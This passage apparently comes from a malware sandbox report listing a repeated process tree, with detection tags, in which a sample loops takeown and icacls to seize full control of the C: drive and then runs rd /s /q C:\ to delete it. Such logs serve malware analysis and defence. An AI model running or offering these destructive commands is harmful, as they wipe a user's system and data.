    - Possible privilege escalation attempt
    PID:6112
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    - Possible privilege escalation attempt
    PID:6660
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:6156
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:7052
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    - Possible privilege escalation attempt
    PID:6908
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:6972
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:6736
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:6456
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:6208
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:6800
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    - Modifies file permissions
    PID:7176
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:7256
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:7272
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    - Possible privilege escalation attempt
    PID:7416
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:7504
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:7520
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:7668
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:7792
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:7808
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:7936
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:8044
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:8056
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:8176
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:6616
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:6688
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    - Possible privilege escalation attempt
    PID:7360
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:7476
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:7452
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:7728
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:7804
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:7800
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:6980
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:8084
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    - Modifies file permissions
    PID:8180
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    - Possible privilege escalation attempt
    PID:7408
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:7580
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:7500
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:8004
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:8036
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:7728
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:7216
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:7388
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:7784
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:7500
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:7304
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:7300
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    - Modifies file permissions
    PID:7768
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:8120
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:7328
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:7728
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:8072
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:7452
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:7868
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:8212
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    - Modifies file permissions
    PID:8220
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:8340
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:8460
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:8468
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:8580
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:8696
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    - Modifies file permissions
    PID:8704
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:8808
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:8920
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:8932
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:9060
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:9184
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    - Modifies file permissions
    PID:9200
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:8312
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:7328
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:8456
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    - Possible privilege escalation attempt
    PID:8640
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:8780
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:8768
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:8928
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:8156
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:9148
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    - Modifies file permissions
    PID:8320
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:8476
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:8552
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    - Possible privilege escalation attempt
    PID:8788
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:9064
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    - Modifies file permissions
    PID:8988
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:8312
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:8568
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    - Modifies file permissions
    PID:4128
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    - Modifies file permissions
    PID:8832
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:9132
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    - Modifies file permissions
    PID:8340
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:8932
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:9016
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    - Modifies file permissions
    PID:9124
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:9112
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:8372
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    - Modifies file permissions
    PID:4128
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    - Modifies file permissions
    PID:7448
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:9288
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:9300
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:9500
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:9608
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:9624
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:9760
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:9868
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:9876
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:10004
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:10140
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:10148
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:9224
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:9400
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:9344
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:9696
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:9812
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:9772
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:10016
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:10136
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:10132
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:10148
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:9476
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:9532
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    - Possible privilege escalation attempt
    PID:9856
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:9884
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:9892
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:8768
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:9404
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:9040
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:9852
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:3720
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:9520
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    - Modifies file permissions
    PID:10020
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:9836
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    - Possible privilege escalation attempt
    PID:9280
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:2716
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:10260
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    - Modifies file permissions
    PID:10268
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:10376
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:10496
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    - Possible privilege escalation attempt
    PID:10512
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:10632
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:10732
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:10748
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:10884
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:11016
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:11028
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:11140
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:11260
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:9780
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    - Modifies file permissions
    PID:10320
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:10576
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    - Possible privilege escalation attempt
    PID:10484
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    - Modifies file permissions
    PID:10636
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:10804
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:10852
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:10960
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:11208
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:11144
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:2628
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:10284
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:10884
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    - Modifies file permissions
    PID:10608
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:10800
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:10924
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    - Possible privilege escalation attempt
    PID:9280
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:2364
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:612
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    - Modifies file permissions
    PID:11196
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:2628
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:10856
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:4728
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:11176
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    - Possible privilege escalation attempt
    PID:748
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:5568
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:9696
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    - Possible privilege escalation attempt
    PID:9780
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:640
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:5368
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:10752
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:5844
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:3996
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:3604
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    - Possible privilege escalation attempt
    PID:9040
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:2424
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:5964
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:2460
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:6212
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:5084
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:4788
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:6728
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:10960
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:5904
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:9040
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    - Modifies file permissions
    PID:5844
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:6340
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:6264
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:6052
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:6360
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:6700
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:6740
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:1276
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:6044
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:10948
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:6876
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:6228
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:7172
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    - Modifies file permissions
    PID:7412
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:6504
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:6536
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:5236
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:11028
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:7152
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:6360
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:6768
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:7036
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:7536
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:5312
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:2460
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:5692
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:8176
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    - Possible privilege escalation attempt
    PID:6052
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:5236
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:7424
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:7280
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:7192
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:11200
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    - Possible privilege escalation attempt
    PID:10948
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:7344
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:7600
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:6492
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:2640
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:6340
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:6344
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:6708
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:8076
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:5236
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:9528
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:8160
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    - Modifies file permissions
    PID:8496
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:7704
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:7936
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    - Possible privilege escalation attempt
    PID:10600
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    - Possible privilege escalation attempt
    PID:8440
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:8536
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    - Modifies file permissions
    PID:6644
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:1284
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:8452
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:8396
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:8400
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:8844
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:7224
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
